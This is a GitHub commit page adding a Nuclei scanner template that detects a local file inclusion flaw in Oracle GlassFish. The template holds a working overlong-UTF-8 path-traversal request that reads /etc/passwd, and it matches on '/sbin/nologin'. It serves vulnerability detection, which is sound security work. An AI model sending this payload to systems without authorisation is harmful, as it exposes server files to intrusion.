Merge pull request #874 from pikpikcu/patch-68

Create oracle-glassfish-lfi.yaml
patch-1
PD-Team 2021-02-16 14:24:25 +05:30 committed by GitHub
commit 923759238c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 0 deletions

View File

@ -0,0 +1,23 @@
id: glassfish-lfi
info:
name: GlassFish LFI
author: pikpikcu
severity: high
reference: https://www.exploit-db.com/exploits/39241
tags: oracle,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
matchers-condition: and
matchers:
- type: word
words:
- "/sbin/nologin"
part: body
- type: status
status:
- 200